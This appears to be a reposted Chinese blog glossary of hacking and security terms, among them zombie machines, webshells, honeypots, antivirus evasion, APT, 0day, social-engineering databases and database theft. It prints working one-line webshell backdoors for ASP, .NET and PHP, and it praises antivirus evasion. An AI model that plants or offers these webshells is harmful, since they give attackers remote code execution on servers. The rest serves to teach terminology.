其他分享
首页 > 其他分享> > 安全术语学习

安全术语学习

作者:互联网

1.肉鸡/抓鸡
肉鸡:
家庭机 网吧机

抓鸡 指通过扫码弱口令 爆破 漏洞自动化 种马达到控制机器 (1433 3389 3306 )

***分类 计算机***
网页*** webshell
大马
小马
一句话***
ASP: <%execute(request("MH"))%>
.NET:<%@Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
PHP:<?php eval($_POST[a]); ?>

蜜罐
蜜罐技术本质上是一种对***方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使***方对它们实施***,从而可以对***行为进行捕获和分析,了解***方所使用的工具与方法,推测***意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。

蜜罐好比是情报收集系统。蜜罐好像是故意让人***的目标,引诱***前来***。所以***者***后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的***和漏洞。还可以通过窃听***之间的联系,收集***所用的种种工具,并且掌握他们的社交网络。

互联网由三层网络组成:表层网,深网,暗网
表层网 搜索引擎搜索的 www.baidu.com
深网 qq 微信 等
暗网 以后缀.onion 以特殊的软件能访问到

免杀
免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒***免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等***技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、***的内容改变特征码,从而躲避了杀毒软件的查杀
您有没有过心爱的工具被杀毒软件KILL的经历;您有没有过辛辛苦苦整理出来的工具集被杀毒软件搞成面目全非而“义愤填膺”的时候;您有没有过好不容易拿到权限,上传的***却被杀的痛心时刻?免杀,它能做的就是避免这些事情的发生!使杀毒软件成为摆设!当然,除此之外免杀技术带给我们更多的,将是思想的飞跃与技术的成长。

apt***
(Advanced Persistent Threat)是指高级持续性威胁。 利用先进的***手段对特定目标进行长期持续性网络***的***形式。
APT***,即高级可持续威胁***,也称为定向威胁***,指某组织对特定对象展开的持续有效的***活动。这种***活动具有极强的隐蔽性和针对性,通常会运用受感染的各种介质、供应链和社会工程学等多种手段实施先进的、持久的且有效的威胁和***。

exploit
Exploit 的英文意思就是利用,它在***眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。
poc
概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型 。

内网***
进入到内网进行******即为内网***

社会工程学
在计算机科学中,社会工程学指的是通过与他人的合法地交流,来使其心理受到影响,做出某些动作或者是透露一些机密信息的方式。这通常被认为是一种欺诈他人以收集信息、行骗和***计算机系统的行为。在英美普通法系中,这一行为一般是被认作侵犯隐私权的。

社工库
社工库就是一个***们将泄漏的用户数据整合分析,然后集中归档的一个地方。这些用户数据大部分来自以前***们***撞库获得的数据包,包含的数据类型除了账号密码外,还包含被***网站所属不同行业所带来的附加数据。
是一种网络信息资源,一些牟利者应用采集到的信息公布到网上供人参考而获利。

谷歌***
谷歌***(Google hacking)是使用搜索引擎,比如谷歌来定位因特网上的安全隐患和易***点。Web上一般有两种容易发现的易受***类型:软件漏洞和错误配置。虽然一些有经验的***者目标是瞄准了一些特殊的系统,同时尝试发现会让他们进入的漏洞,但是大部分的***者是从具体的软件漏洞开始或者是从那些普通用户错误配置开始,在这些配置中,他们已经知道怎样侵入,并且初步的尝试发现或扫描有该种漏洞的系统。谷歌对于第一种***者来说用处很少,但是对于第二种***者则发挥了重要作用。

***
***的谐音是对应脱库。脱库的意思是:是指通过非法手段获取网站的数据库,会员的信息或者自己需要的信息。简单的说,就是把数据库下载下来。

提权
顾名思义拿到WebShell之后从普通用户提升为管理员权限。

0day 一种对计算机软件的***方式

在计算机领域中,零日漏洞或零时差漏洞(英语:Zero-day exploit、 zero-day、0-day)通常是指还没有补丁的安全漏洞,而零日***或零时差***(英语:Zero-day attack)则是指利用这种漏洞进行的***。提供该漏洞细节或者利用程序的人通常是该漏洞的发现者。零日漏洞的利用程序对网络安全具有巨大威胁,因此零日漏洞不但是***的最爱,掌握多少零日漏洞也成为评价***技术水平的一个重要参数。

旁站
目标站点所在服务器上其他网站,然后再想办法跨到真正目标站点目录中。

c段
网段中的任意一台机器,只要子网想同就有可能嗅探到帐号密码。

标签:术语,零日,蜜罐,漏洞,技术,学习,安全,杀毒软件,免杀
来源: https://blog.51cto.com/865516915/2421995